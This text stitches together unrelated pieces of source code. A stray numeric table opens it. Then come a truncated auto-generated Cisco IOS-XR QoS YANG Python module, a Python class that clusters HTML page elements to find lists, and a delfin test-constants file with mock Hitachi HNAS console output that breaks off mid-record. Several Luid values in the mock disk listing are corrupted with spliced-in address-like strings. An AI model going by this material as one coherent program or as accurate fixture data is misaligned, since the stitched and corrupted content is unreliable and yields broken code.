1 379 0 0
1 380 2 1 381 382
1 381 2 1 380 382
1 382 0 0
1 383 2 1 384 385
1 384 2 1 383 385
1 385 0 0
1 386 2 1 387 388
1 387 2 1 386 388
1 388 0 0
1 389 2 1 390 391
1 390 2 1 389 391
1 391 0 0
1 392 2 1 393 394
1 393 2 1 392 394
1 394 0 0
1 395 2 1 396 397
1 396 2 1 395 397
1 397 0 0
1 398 2 1 399 400
1 | |
<gh_stars>0
""" Cisco_IOS_XR_skp_qos_oper
This module contains a collection of YANG definitions
for Cisco IOS\-XR skp\-qos package operational data.
This module contains definitions
for the following management objects\:
platform\-qos\: QoS Skywarp platform operational data
platform\-qos\-ea\: platform qos ea
Copyright (c) 2013\-2017 by Cisco Systems, Inc.
All rights reserved.
"""
from collections import OrderedDict
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class Action(Enum):
"""
Action (Enum Class)
Action type
.. data:: police_transmit = 0
Police action transmit
.. data:: police_set_transmit = 1
Police action set transmit
.. data:: police_drop = 2
Police action drop
.. data:: police_unknown = 3
Police action unknown
"""
police_transmit = Enum.YLeaf(0, "police-transmit")
police_set_transmit = Enum.YLeaf(1, "police-set-transmit")
police_drop = Enum.YLeaf(2, "police-drop")
police_unknown = Enum.YLeaf(3, "police-unknown")
class ActionOpcode(Enum):
"""
ActionOpcode (Enum Class)
Action opcode
.. data:: precedence = 0
Precedence
.. data:: dscp = 1
DSCP
.. data:: discard_class = 2
Discard class
.. data:: qos_group = 3
QoS group
.. data:: cos_inner = 4
COS inner
.. data:: cos = 5
COS
.. data:: exp_top = 6
EXP top
.. data:: exp_imp = 7
EXP IMP
.. data:: tunnel_precedence = 8
Tunnel precedence
.. data:: tunnel_dscp = 9
Tunnel DSCP
.. data:: itag_dei = 10
ITAG DEI
.. data:: itag_cos = 11
ITAG COS
.. data:: cos_imposition = 12
COS imposition
.. data:: dei_imposition = 13
DEI imposition
.. data:: dei = 14
DEI
.. data:: no_marking = 15
No marking
"""
precedence = Enum.YLeaf(0, "precedence")
dscp = Enum.YLeaf(1, "dscp")
discard_class = Enum.YLeaf(2, "discard-class")
qos_group = Enum.YLeaf(3, "qos-group")
cos_inner = Enum.YLeaf(4, "cos-inner")
cos = Enum.YLeaf(5, "cos")
exp_top = Enum.YLeaf(6, "exp-top")
exp_imp = Enum.YLeaf(7, "exp-imp")
tunnel_precedence = Enum.YLeaf(8, "tunnel-precedence")
tunnel_dscp = Enum.YLeaf(9, "tunnel-dscp")
itag_dei = Enum.YLeaf(10, "itag-dei")
itag_cos = Enum.YLeaf(11, "itag-cos")
cos_imposition = Enum.YLeaf(12, "cos-imposition")
dei_imposition = Enum.YLeaf(13, "dei-imposition")
dei = Enum.YLeaf(14, "dei")
no_marking = Enum.YLeaf(15, "no-marking")
class CacState(Enum):
"""
CacState (Enum Class)
CAC/UBRL class states
.. data:: unknown = 0
unknown
.. data:: admit = 1
admit
.. data:: redirect = 2
redirect
.. data:: ubrl = 3
ubrl
"""
unknown = Enum.YLeaf(0, "unknown")
admit = Enum.YLeaf(1, "admit")
redirect = Enum.YLeaf(2, "redirect")
ubrl = Enum.YLeaf(3, "ubrl")
class PolicyParamUnit(Enum):
"""
PolicyParamUnit (Enum Class)
Policy param unit
.. data:: policy_param_unit_invalid = 0
policy param unit invalid
.. data:: policy_param_unit_bytes = 1
policy param unit bytes
.. data:: policy_param_unit_kbytes = 2
policy param unit kbytes
.. data:: policy_param_unit_mbytes = 3
policy param unit mbytes
.. data:: policy_param_unit_gbytes = 4
policy param unit gbytes
.. data:: policy_param_unit_bitsps = 5
policy param unit bitsps
.. data:: policy_param_unit_kbitsps = 6
policy param unit kbitsps
.. data:: policy_param_unit_mbitsps = 7
policy param unit mbitsps
.. data:: policy_param_unit_gbitsps = 8
policy param unit gbitsps
.. data:: policy_param_unit_cells_ps = 9
policy param unit cells ps
.. data:: policy_param_unit_packets_ps = 10
policy param unit packets ps
.. data:: policy_param_unit_us = 11
policy param unit us
.. data:: policy_param_unit_ms = 12
policy param unit ms
.. data:: policy_param_unit_seconds = 13
policy param unit seconds
.. data:: policy_param_unit_packets = 14
policy param unit packets
.. data:: policy_param_unit_cells = 15
policy param unit cells
.. data:: policy_param_unit_percent = 16
policy param unit percent
.. data:: policy_param_unit_per_thousand = 17
policy param unit per thousand
.. data:: policy_param_unit_per_million = 18
policy param unit per million
.. data:: policy_param_unit_hz = 19
policy param unit hz
.. data:: policy_param_unit_khz = 20
policy param unit khz
.. data:: policy_param_unit_mhz = 21
policy param unit mhz
.. data:: policy_param_unit_ratio = 22
policy param unit ratio
.. data:: policy_param_unit_max = 23
policy param unit max
"""
policy_param_unit_invalid = Enum.YLeaf(0, "policy-param-unit-invalid")
policy_param_unit_bytes = Enum.YLeaf(1, "policy-param-unit-bytes")
policy_param_unit_kbytes = Enum.YLeaf(2, "policy-param-unit-kbytes")
policy_param_unit_mbytes = Enum.YLeaf(3, "policy-param-unit-mbytes")
policy_param_unit_gbytes = Enum.YLeaf(4, "policy-param-unit-gbytes")
policy_param_unit_bitsps = Enum.YLeaf(5, "policy-param-unit-bitsps")
policy_param_unit_kbitsps = Enum.YLeaf(6, "policy-param-unit-kbitsps")
policy_param_unit_mbitsps = Enum.YLeaf(7, "policy-param-unit-mbitsps")
policy_param_unit_gbitsps = Enum.YLeaf(8, "policy-param-unit-gbitsps")
policy_param_unit_cells_ps = Enum.YLeaf(9, "policy-param-unit-cells-ps")
policy_param_unit_packets_ps = Enum.YLeaf(10, "policy-param-unit-packets-ps")
policy_param_unit_us = Enum.YLeaf(11, "policy-param-unit-us")
policy_param_unit_ms = Enum.YLeaf(12, "policy-param-unit-ms")
policy_param_unit_seconds = Enum.YLeaf(13, "policy-param-unit-seconds")
policy_param_unit_packets = Enum.YLeaf(14, "policy-param-unit-packets")
policy_param_unit_cells = Enum.YLeaf(15, "policy-param-unit-cells")
policy_param_unit_percent = Enum.YLeaf(16, "policy-param-unit-percent")
policy_param_unit_per_thousand = Enum.YLeaf(17, "policy-param-unit-per-thousand")
policy_param_unit_per_million = Enum.YLeaf(18, "policy-param-unit-per-million")
policy_param_unit_hz = Enum.YLeaf(19, "policy-param-unit-hz")
policy_param_unit_khz = Enum.YLeaf(20, "policy-param-unit-khz")
policy_param_unit_mhz = Enum.YLeaf(21, "policy-param-unit-mhz")
policy_param_unit_ratio = Enum.YLeaf(22, "policy-param-unit-ratio")
policy_param_unit_max = Enum.YLeaf(23, "policy-param-unit-max")
class PolicyState(Enum):
"""
PolicyState (Enum Class)
Different Interface states
.. data:: active = 0
active
.. data:: suspended = 1
suspended
"""
active = Enum.YLeaf(0, "active")
suspended = Enum.YLeaf(1, "suspended")
class QosUnit(Enum):
"""
QosUnit (Enum Class)
QoS parameter unit
.. data:: invalid = 0
Invalid type
.. data:: bytes = 1
Bytes
.. data:: kilobytes = 2
Kilobytes
.. data:: megabytes = 3
Megabytes
.. data:: gigabytes = 4
Gigabytes
.. data:: bps = 5
Bits per second
.. data:: kbps = 6
Kilo bits per second
.. data:: mbps = 7
Mega bits per second
.. data:: gbps = 8
Giga bits per second
.. data:: cells_per_second = 9
Cells per second
.. data:: packets_per_second = 10
Packets per second
.. data:: microsecond = 11
Microsecond
.. data:: millisecond = 12
Millisecond
.. data:: packets = 13
Number of packets
.. data:: cells = 14
Number of cells
.. data:: percentage = 15
Percentage
.. data:: ratio = 16
Ratio
"""
invalid = Enum.YLeaf(0, "invalid")
bytes = Enum.YLeaf(1, "bytes")
kilobytes = Enum.YLeaf(2, "kilobytes")
megabytes = Enum.YLeaf(3, "megabytes")
gigabytes = Enum.YLeaf(4, "gigabytes")
bps = Enum.YLeaf(5, "bps")
kbps = Enum.YLeaf(6, "kbps")
mbps = Enum.YLeaf(7, "mbps")
gbps = Enum.YLeaf(8, "gbps")
cells_per_second = Enum.YLeaf(9, "cells-per-second")
packets_per_second = Enum.YLeaf(10, "packets-per-second")
microsecond = Enum.YLeaf(11, "microsecond")
millisecond = Enum.YLeaf(12, "millisecond")
packets = Enum.YLeaf(13, "packets")
cells = Enum.YLeaf(14, "cells")
percentage = Enum.YLeaf(15, "percentage")
ratio = Enum.YLeaf(16, "ratio")
class TbAlgorithm(Enum):
"""
TbAlgorithm (Enum Class)
Tokenbucket type
.. data:: inactive = 0
Inactive, configured but disabled
.. data:: single = 1
Single token bucket
.. data:: single_rate_tcm = 2
Single rate three color marker
.. data:: two_rate_tcm = 3
Two rate three color marker
.. data:: mef_tcm = 4
Allows coupling between CIR and PIR tb's
.. data:: dummy = 5
Internal dummy token bucket for coupled-policer
child
"""
inactive = Enum.YLeaf(0, "inactive")
single = Enum.YLeaf(1, "single")
single_rate_tcm = Enum.YLeaf(2, "single-rate-tcm")
two_rate_tcm = Enum.YLeaf(3, "two-rate-tcm")
mef_tcm = Enum.YLeaf(4, "mef-tcm")
dummy = Enum.YLeaf(5, "dummy")
class Wred(Enum):
"""
Wred (Enum Class)
Wred
.. data:: wred_cos_cmd = 0
wred cos cmd
.. data:: wred_dscp_cmd = 1
wred dscp cmd
.. data:: wred_precedence_cmd = 2
wred precedence cmd
.. data:: wred_discard_class_cmd = 3
wred discard class cmd
.. data:: wred_mpls_exp_cmd = 4
wred mpls exp cmd
.. data:: red_with_user_min_max = 5
red with user min max
.. data:: red_with_default_min_max = 6
red with default min max
.. data:: wred_dei_cmd = 7
wred dei cmd
.. data:: wred_ecn_cmd = 8
wred ecn cmd
.. data:: wred_invalid_cmd = 9
wred invalid cmd
"""
wred_cos_cmd = Enum.YLeaf(0, "wred-cos-cmd")
wred_dscp_cmd = Enum.YLeaf(1, "wred-dscp-cmd")
wred_precedence_cmd = Enum.YLeaf(2, "wred-precedence-cmd")
wred_discard_class_cmd = Enum.YLeaf(3, "wred-discard-class-cmd")
wred_mpls_exp_cmd = Enum.YLeaf(4, "wred-mpls-exp-cmd")
red_with_user_min_max = Enum.YLeaf(5, "red-with-user-min-max")
red_with_default_min_max = Enum.YLeaf(6, "red-with-default-min-max")
wred_dei_cmd = Enum.YLeaf(7, "wred-dei-cmd")
wred_ecn_cmd = Enum.YLeaf(8, "wred-ecn-cmd")
wred_invalid_cmd = Enum.YLeaf(9, "wred-invalid-cmd")
class PlatformQos(Entity):
"""
QoS Skywarp platform operational data
.. attribute:: nodes
List of nodes with platform specific QoS configuration
**type**\: :py:class:`Nodes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_skp_qos_oper.PlatformQos.Nodes>`
"""
_prefix = 'skp-qos-oper'
_revision = '2016-02-18'
def __init__(self):
super(PlatformQos, self).__init__()
self._top_entity = None
self.yang_name = "platform-qos"
self.yang_parent_name = "Cisco-IOS-XR-skp-qos-oper"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_container_classes = OrderedDict([("nodes", ("nodes", PlatformQos.Nodes))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict()
self.nodes = PlatformQos.Nodes()
self.nodes.parent = self
self._children_name_map["nodes"] = "nodes"
self._children_yang_names.add("nodes")
self._segment_path = lambda: "Cisco-IOS-XR-skp-qos-oper:platform-qos"
class Nodes(Entity):
"""
List of nodes with platform specific QoS
configuration
.. attribute:: node
Node with platform specific QoS configuration
**type**\: list of :py:class:`Node <ydk.models.cisco_ios_xr.Cisco_IOS_XR_skp_qos_oper.PlatformQos.Nodes.Node>`
"""
_prefix = 'skp-qos-oper'
_revision = '2016-02-18'
def __init__(self):
super(PlatformQos.Nodes, self).__init__()
self.yang_name = "nodes"
self.yang_parent_name = "platform-qos"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([("node", ("node", PlatformQos.Nodes.Node))])
| |
<filename>landmarkrest/util/TreeListLearner.py
import re
import json
import sys
from PageManager import PageManager
from Tree import Tree
import time
import TreeNode
import math
import itertools
void_tags = frozenset(['area', 'base', 'br', 'col', 'command', 'embed', 'hr', 'img', 'input', 'keygen', 'link', 'meta',
'param', 'source', 'track', 'wbr'])
class TreeListLearner(object):
def __init__(self):
self.__minEdgeWeight = 2
self.__DEBUG = False
@staticmethod
def cluster_slot(pg, intervals):
structs = pg.getVisibleTokenStructure(data_as_strings=False, data_as_tokens=True)
sorted_structs = {}
for interval in intervals:
sorted_structs[interval] = []
tree = Tree()
forward_tree = Tree()
for struct in structs:
first_vis_token_loc = struct['visible_token_buffer'][0].token_location
last_vis_token_loc = struct['visible_token_buffer'][-1].token_location
for interval in intervals:
if interval[2] == struct['page_id'] and last_vis_token_loc >= interval[0] and first_vis_token_loc < interval[1]:
visible_tokens = [a.token for a in struct['visible_token_buffer']]
visible_text = ''.join(visible_tokens)
# find html tags leading up to the current visible chunk
potential_toks = re.findall(r'(</?[\w\-]+.*?>)', ''.join(struct['invisible_token_buffer_before']))
tokens_for_path = []
# remove all attributes, other than class, from the html tags
for tok in potential_toks:
tokens_for_path.append(re.sub(r'\s(?!class=)[a-z\-_]+=(?:(?:\'.*?\')|(?:".*?"))', '', tok))
meta_struct = {
'visible_text': visible_text,
'first_vis_token_loc': first_vis_token_loc,
'last_vis_token_loc': last_vis_token_loc,
'page_id': struct['page_id'],
'clusters': set(),
'path': '<BRK>'.join(tokens_for_path),
'tags': list(tokens_for_path)
}
# add list of html tags, and list of visible tokens to trees
tokens_for_path.reverse()
tree.add_node_set(tokens_for_path, meta_struct)
forward_tree.add_node_set(visible_tokens, meta_struct)
sorted_structs[interval].append(meta_struct)
break
count = tree.cluster_meta_data()
forward_tree.cluster_meta_data(count)
#if len(intervals) == 10:
# print '\n\ncluster all'
# for interval in sorted_structs:
# print '\n'
# for meta in sorted_structs[interval]:
# print meta['visible_text']
#for page_id in sorted_structs:
# for meta in sorted_structs[page_id]:
# print '{:30}'.format(", ".join(sorted(meta['clusters'], key=lambda x: x.rjust(3,'0')))[:30]) + \
# " : " + '{:30}'.format(meta['path'][-30:]) + " : " + meta['visible_text'][:20]
# print ''
# break
clusters = TreeListLearner.cluster_all(sorted_structs)
#if len(intervals) == 10:
# print '\n\nclusters'
# for cluster in clusters:
# print '\ncluster'
# for interval in cluster:
# print ''
# for meta in sorted_structs[interval]:
# print meta['visible_text']
return clusters
@staticmethod
def cluster_all(structs):
labels = set()
for interval in structs:
for meta in structs[interval]:
labels.update(meta['clusters'])
best_cluster = {}
most_predictions = 0
for marker in labels:
predictions = None
cluster = {}
for interval in filter(lambda x: any([marker in meta['clusters'] for meta in structs[x]]), structs.keys()):
cluster[interval] = interval
for interval in cluster:
counts = {}
for meta in structs[interval]:
for label in meta['clusters']:
if label in counts:
counts[label] += 1
else:
counts[label] = 1
if predictions is None:
predictions = counts
else:
to_remove = []
for prediction in predictions:
if prediction not in counts or predictions[prediction] != counts[prediction]:
to_remove.append(prediction)
for word in to_remove:
del predictions[word]
if len(predictions) * len(cluster) > most_predictions:
most_predictions = len(predictions) * len(cluster)
best_cluster = cluster
if len(best_cluster) == 0:
for interval in structs:
best_cluster[interval] = interval
clusters = [best_cluster]
remaining = {}
for interval in structs:
if interval not in best_cluster:
remaining[interval] = structs[interval]
if len(remaining) > 0:
clusters.extend(TreeListLearner.cluster_all(remaining))
return clusters
@staticmethod
def find_lists(pg):
lists = {}
for page_id in pg.get_pages():
lists[page_id] = {}
all_slot_structs = [pg.getVisibleTokenStructure(data_as_strings=False, data_as_tokens=True)]
list_num = 0
for slot_structs in all_slot_structs:
tree = Tree()
forward_tree = Tree()
metas = dict()
for page_id in pg.get_pages():
metas[page_id] = []
for struct in slot_structs:
visible_tokens = [a.token for a in struct['visible_token_buffer']]
visible_text = ''.join(visible_tokens)
first_vis_token_loc = struct['visible_token_buffer'][0].token_location
last_vis_token_loc = struct['visible_token_buffer'][-1].token_location
#find html tags leading up to the current visible chunk
potential_toks = re.findall(r'(</?[\w\-]+.*?>)', ''.join(struct['invisible_token_buffer_before']))
tokens_for_path = []
#remove all attributes, other than class, from the html tags
for tok in potential_toks:
tokens_for_path.append(re.sub(r'\s(?!class=)[a-z\-_]+=(?:(?:\'.*?\')|(?:".*?"))', '', tok))
meta_struct = {
'visible_text': visible_text,
'first_vis_token_loc': first_vis_token_loc,
'last_vis_token_loc': last_vis_token_loc,
'page_id': struct['page_id'],
'clusters': set(),
'path': '<BRK>'.join(tokens_for_path),
'tags': list(tokens_for_path)
}
#add list of html tags, and list of visible tokens to trees
tokens_for_path.reverse()
tree.add_node_set(tokens_for_path, meta_struct)
forward_tree.add_node_set(visible_tokens, meta_struct)
metas[meta_struct['page_id']].append(meta_struct)
# print 'START TREE DISPLAY'
# tree.display()
# print 'END TREE DISPLAY'
#add clusters to meta structures based on their positions in the trees
count = tree.cluster_meta_data()
forward_tree.cluster_meta_data(count)
#sort meta structures by position on pages
spans = []
for page_id in metas:
metas[page_id] = sorted(metas[page_id], key=lambda x: x['first_vis_token_loc'])
span = []
for meta in metas[page_id]:
span.append(meta['clusters'])
spans.append(span)
row_marker = TreeListLearner.find_row_marker(spans)
#for page_id in metas:
# for meta in metas[page_id]:
# print '{:30}'.format(", ".join(sorted(meta['clusters'], key=lambda x: x.rjust(3,'0')))[:30]) + \
# " : " + '{:30}'.format(meta['path'][-30:]) + " : " + meta['visible_text'][:20]
# print ''
# break
if row_marker:
#print row_marker
list_id = 'list_' + str(list_num)
in_template = TreeListLearner.list_location(row_marker, metas, pg.get_pages(), lists, list_id)
#also look for lists in the spaces before and after this list
all_slot_structs.append(filter(
lambda x: x['visible_token_buffer'][-1].token_location < lists[x['page_id']][list_id][
'starting_token_location'], slot_structs))
all_slot_structs.append(filter(
lambda x: x['visible_token_buffer'][0].token_location >= lists[x['page_id']][list_id][
'ending_token_location'], slot_structs))
if in_template:
for page_id in lists:
del lists[page_id][list_id]
else:
list_num += 1
return lists
@staticmethod
def list_location(row_marker, metas, pages, lists, list_id):
#print row_marker
template_list = True
visible_string = None
for page in metas:
visible_list = []
first_elems = [None]
marker = None
window = []
first_depth = None
last_depth = None
first_index = None
last_index = None
#find the highest level in the DOM between each pair of row markers and split the rows there
for num, meta in enumerate(metas[page]):
window.append(meta)
if row_marker in meta['clusters']:
if marker:
visible_list.extend(window)
marker = meta
depth = 0
split_elem = marker
shallowest = 0
for elem in window:
for tag in elem['tags']:
match = re.search(r'<(/?)([\w\-]+).*?(/?)>', tag)
if match.group(2) not in void_tags and not match.group(3):
if match.group(1):
depth -= 1
if depth < shallowest:
shallowest = depth
split_elem = elem
else:
depth += 1
if first_depth is None:
first_depth = shallowest
last_depth = shallowest - depth
last_index = num
first_elems.append(split_elem)
else:
first_index = num
marker = meta
window = []
if visible_string is None:
visible_string = ''.join([meta['visible_text'] for meta in visible_list])
elif template_list and visible_string != ''.join([meta['visible_text'] for meta in visible_list]):
template_list = False
#find the beginning of the first row at the same DOM level that splits the first and second rows
if first_depth:
depth = 0
done = False
for meta in metas[page][first_index::-1]:
for tag in reversed(meta['tags']):
match = re.search(r'<(/?)([\w\-]+).*?(/?)>', tag)
if match.group(2) not in void_tags and not match.group(3):
if match.group(1):
depth += 1
else:
depth -= 1
if depth <= first_depth:
first_elems[0] = meta
done = True
break
if done:
break
if not done:
first_elems[0] = metas[page][0]
#find the end of the last row at the same DOM level that splits the last and second to last rows
depth = 0
done = False
prev_meta = metas[page][last_index]
for meta in metas[page][last_index+1:]:
for tag in meta['tags']:
match = re.search(r'<(/?)([\w\-]+).*?(/?)>', tag)
if match.group(2) not in void_tags and not match.group(3):
if match.group(1):
depth -= 1
if depth <= last_depth:
first_elems.append(prev_meta)
done = True
break
else:
depth += 1
if done:
break
prev_meta = meta
if not done:
first_elems.append(prev_meta)
prev_elem = None
lists[page][list_id] = {'sequence':[]}
for num, elem in enumerate(first_elems):
#print elem['visible_text']
if prev_elem:
if num == len(first_elems) - 1:
row_data = {
'extract': pages[page].tokens.getTokensAsString(prev_elem['first_vis_token_loc'],
elem['last_vis_token_loc']+1, True),
'sequence_number': num,
'starting_token_location': prev_elem['first_vis_token_loc']
}
else:
row_data = {
'extract': pages[page].tokens.getTokensAsString(prev_elem['first_vis_token_loc'],elem['first_vis_token_loc'], True),
'sequence_number': num,
'starting_token_location': prev_elem['first_vis_token_loc']
}
lists[page][list_id]['sequence'].append(row_data)
lists[page][list_id]['ending_token_location'] = elem['last_vis_token_loc']+1
prev_elem = elem
lists[page][list_id]['starting_token_location'] = lists[page][list_id]['sequence'][0]['starting_token_location']
else:
lists[page][list_id] = {}
lists[page][list_id]['starting_token_location'] = marker['first_vis_token_loc']
lists[page][list_id]['ending_token_location'] = marker['last_vis_token_loc']+1
return template_list
@staticmethod
def find_row_marker(spans):
#only look for markers that appear on every page
terminals = set()
first = True
for span in spans:
span_terminals = set()
for element in span:
span_terminals.update(element)
if first:
terminals = span_terminals
first = False
else:
terminals.intersection_update(span_terminals)
best_marker = None
#terminals = sorted(terminals, key=lambda x: x.rjust(3, '0'))
most_predictions = 0
for row_marker in terminals:
predictions = None
#get the strings that appear between each pair of row markers
folds = []
for span in spans:
fold = None
count = 0
for word in span:
if row_marker in word:
if fold:
folds.append(fold)
count+=1
fold = [word]
elif fold:
fold.append(word)
#if there are not a certain number of folds on average, it's probably not a list
if len(folds) > 1.25 * len(spans):
#find the items which we can predict exactly how many times they appear between each pair of markers
for fold in folds:
counts = dict()
for word in fold:
for label in word:
if label in counts:
counts[label] += 1
elif label != row_marker:
counts[label] = 1
if predictions is | |
<filename>delfin/tests/unit/drivers/hitachi/hnas/constants.py<gh_stars>1-10
# Copyright 2021 The SODA Authors.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
ACCESS_INFO = {
"storage_id": "12345",
"vendor": "hitachi",
"model": "hnas",
"ssh": {
"host": "192.168.3.211",
"port": 22,
"username": "manager",
"password": "<PASSWORD>",
}
}
STORAGE_INFO = """\r
cluster-show\r
HDS NAS OS Console\r
MAC ID : B7-6F-30-98-A6-57\r
\r
pba-hnas-1-1:$ cluster-show\r
Overall Status = Online\r
Cluster Health = Robust\r
Cluster Mode = Not clustered\r
Cluster Name = pba-hnas-1\r
Cluster UUID = a39f815a-e582-11d6-9000-b76f3098a657\r
Cluster Size = 1\r
Node Name = pba-hnas-1-1\r
Node ID = 1\r
Cluster GenId = 1\r
Cluster Master = No\r
\r
pba-hnas-1-1:$ """
VERSION_INFO = """\r
ver\r
HDS NAS OS Console\r
MAC ID : B7-6F-30-98-A6-57\r
\r
pba-hnas-1-1:$ ver\r
\r
Model: HNAS 4060\r
\r
Software: 12.7.4221.12 (built 2016-10-28 21:51:37+01:00)\r
\r
Hardware: NAS Platform (M4SJKW1423160)\r
\r
board MMB1\r
mmb 12.7.4221.12 release (2016-10-28 21:51:37+01:00)\r
\r
board MFB2\r
mfb2hw MB v0132 WL v0132 TD v0132 FD v0132 TC v00C6 RY v00C6 \r
TY v00C6 IC v00C6 WF v007C FS v007C OS v007C WD v007C D0 v0077 \r
Serial no B1423125 (Tue Jun 17 13:38:33 2014)\r
\r
board MCP\r
Serial no B1423160 (Wed Jun 18 20:39:53 2014)\r
\r
pba-hnas-1-1:$ """
LOCATION_INFO = """\r
system-information-get\r
\r
HDS NAS OS Console\r
MAC ID : B7-6F-30-98-A6-57\r
\r
pba-hnas-1-1:$ system-information-get\r
\r
Name: pba-hnas-1\r
Location: chengdu\r
Contact: \r
\r
pba-hnas-1-1:$ """
DISK_INFO = """\r
sd-list --scsi\r
HDS NAS OS Console\r
MAC ID : B7-6F-30-98-A6-57\r
\r
pba-hnas-1-1:$ sd-list --scsi\r
Device ID: 0\r
Comment: \r
Capacity: 50GiB (53687746560 bytes)\r
Status: OK\r
Role: Primary\r
Access: Allowed\r
Used in span: 'span1' (capacity 200GiB)\r
Type: Make: HITACHI; Model: OPEN-V; Revision: 7303\r
Submodel: HM70\r
Luid: [03:01:00]60:06:0E:80:13:32:66:00:50:20:32:66:00:00:10:00\r
Blocksize: 512\r
Superflush: Default\r
Lun: 0\r
Serial number: 212902\r
Site ID: 0\r
Tier: 1\r
HDS ctrlr port: 0000\r
HDS dev name: 1000\r
HDP pool no: 0\r
GAD: No\r
Queue depth: min 16, default 32, max 512, configured [default],
effective 32\r
\r
Device ID: 1\r
Comment: \r
Capacity: 50GiB (53687746560 bytes)\r
Status: OK\r
Role: Primary\r
Access: Allowed\r
Used in span: 'span1' (capacity 200GiB)\r
Type: Make: HITACHI; Model: OPEN-V; Revision: 7303\r
Submodel: HM70\r
Luid: [03:01:00]60:06:0E:80:13:32:66:00:50:20:32:66:00:00:10:01\r
Blocksize: 512\r
Superflush: Default\r
Lun: 1\r
Serial number: 212902\r
Site ID: 0\r
Tier: 1\r
HDS ctrlr port: 0400\r
HDS dev name: 1001\r
HDP pool no: 0\r
GAD: No\r
Queue depth: min 16, default 32, max 512, configured [default],
effective 32\r
\r
Device ID: 2\r
Comment: \r
Capacity: 50GiB (53687746560 bytes)\r
Status: OK\r
Role: Primary\r
Access: Allowed\r
Used in span: 'span1' (capacity 200GiB)\r
Type: Make: HITACHI; Model: OPEN-V; Revision: 7303\r
Submodel: HM70\r
Luid: [03:01:00]fc00:db20:35b:7399::5:50:20:32:66:00:00:10:02\r
Blocksize: 512\r
Superflush: Default\r
Lun: 2\r
Serial number: 212902\r
Site ID: 0\r
Tier: 1\r
HDS ctrlr port: 0000\r
HDS dev name: 1002\r
HDP pool no: 0\r
GAD: No\r
Queue depth: min 16, default 32, max 512, configured [default],
effective 32\r
\r
Device ID: 3\r
Comment: \r
Capacity: 50GiB (53687746560 bytes)\r
Status: OK\r
Role: Primary\r
Access: Allowed\r
Used in span: 'span1' (capacity 200GiB)\r
Type: Make: HITACHI; Model: OPEN-V; Revision: 7303\r
Submodel: HM70\r
Luid: [03:01:00]60:06:0E:80:13:32:66:00:50:20:32:66:00:00:10:03\r
Blocksize: 512\r
Superflush: Default\r
Lun: 3\r
Serial number: 212902\r
Site ID: 0\r
Tier: 1\r
HDS ctrlr port: 0400\r
HDS dev name: 1003\r
HDP pool no: 0\r
GAD: No\r
Queue depth: min 16, default 32, max 512, configured [default],
effective 32\r
\r
Device ID: 4\r
Comment: \r
Capacity: 50GiB (53687746560 bytes)\r
Status: OK\r
Role: Primary\r
Access: Allowed\r
Used in span: 'span2' (capacity 400GiB)\r
Type: Make: HITACHI; Model: OPEN-V; Revision: 7303\r
Submodel: HM70\r
Luid: [03:01:00]60:06:0E:80:13:32:66:00:50:20:32:66:00:00:10:04\r
Blocksize: 512\r
Superflush: Default\r
Lun: 4\r
Serial number: 212902\r
Site ID: 0\r
Tier: None\r
HDS ctrlr port: 0000\r
HDS dev name: 1004\r
HDP pool no: 0\r
GAD: No\r
Queue depth: min 16, default 32, max 512, configured [default],
effective 32\r
\r
Device ID: 5\r
Comment: \r
Capacity: 50GiB (53687746560 bytes)\r
Status: OK\r
Role: Primary\r
Access: Allowed\r
Used in span: 'span2' (capacity 400GiB)\r
Type: Make: HITACHI; Model: OPEN-V; Revision: 7303\r
Submodel: HM70\r
Luid: [03:01:00]60:fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b:20:32:66:00:00:10:05\r
Blocksize: 512\r
Superflush: Default\r
Lun: 5\r
Serial number: 212902\r
Site ID: 0\r
Tier: None\r
HDS ctrlr port: 0400\r
HDS dev name: 1005\r
HDP pool no: 0\r
GAD: No\r
Queue depth: min 16, default 32, max 512, configured [default],
effective 32\r
\r
Device ID: 6\r
Comment: \r
Capacity: 50GiB (53687746560 bytes)\r
Status: OK\r
Role: Primary\r
Access: Allowed\r
Used in span: 'span2' (capacity 400GiB)\r
Type: Make: HITACHI; Model: OPEN-V; Revision: 7303\r
Submodel: HM70\r
Luid: [03:01:00]60:06:0E:80:13:32:66:00:50:20:32:66:00:00:10:06\r
Blocksize: 512\r
Superflush: Default\r
Lun: 6\r
Serial number: 212902\r
Site ID: 0\r
Tier: None\r
HDS ctrlr port: 0000\r
HDS dev name: 1006\r
HDP pool no: 0\r
GAD: No\r
Queue depth: min 16, default 32, max 512, configured [default],
effective 32\r
\r
Device ID: 7\r
Comment: \r
Capacity: 50GiB (53687746560 bytes)\r
Status: OK\r
Role: Primary\r
Access: Allowed\r
Used in span: 'span2' (capacity 400GiB)\r
Type: Make: HITACHI; Model: OPEN-V; Revision: 7303\r
Submodel: HM70\r
Luid: [03:01:00]60:06:0E:80:13:32:66:00:50:20:32:66:00:00:10:07\r
Blocksize: 512\r
Superflush: Default\r
Lun: 7\r
Serial number: 212902\r
Site ID: 0\r
Tier: None\r
HDS ctrlr port: 0400\r
HDS dev name: 1007\r
HDP pool no: 0\r
GAD: No\r
Queue depth: min 16, default 32, max 512, configured [default],
effective 32\r
\r
Device ID: 8\r
Comment: \r
Capacity: 50GiB (53687746560 bytes)\r
Status: OK\r
Role: Primary\r
Access: Allowed\r
Used in span: 'span2' (capacity 400GiB)\r
Type: Make: HITACHI; Model: OPEN-V; Revision: 7303\r
Submodel: HM70\r
Luid: [03:01:00]60:06:0E:80:13:32:66:00:50:20:32:66:00:00:10:08\r
Blocksize: 512\r
Superflush: Default\r
Lun: 8\r
Serial number: 212902\r
Site ID: 0\r
Tier: None\r
HDS ctrlr port: 0400\r
HDS dev name: 1008\r
HDP pool no: 0\r
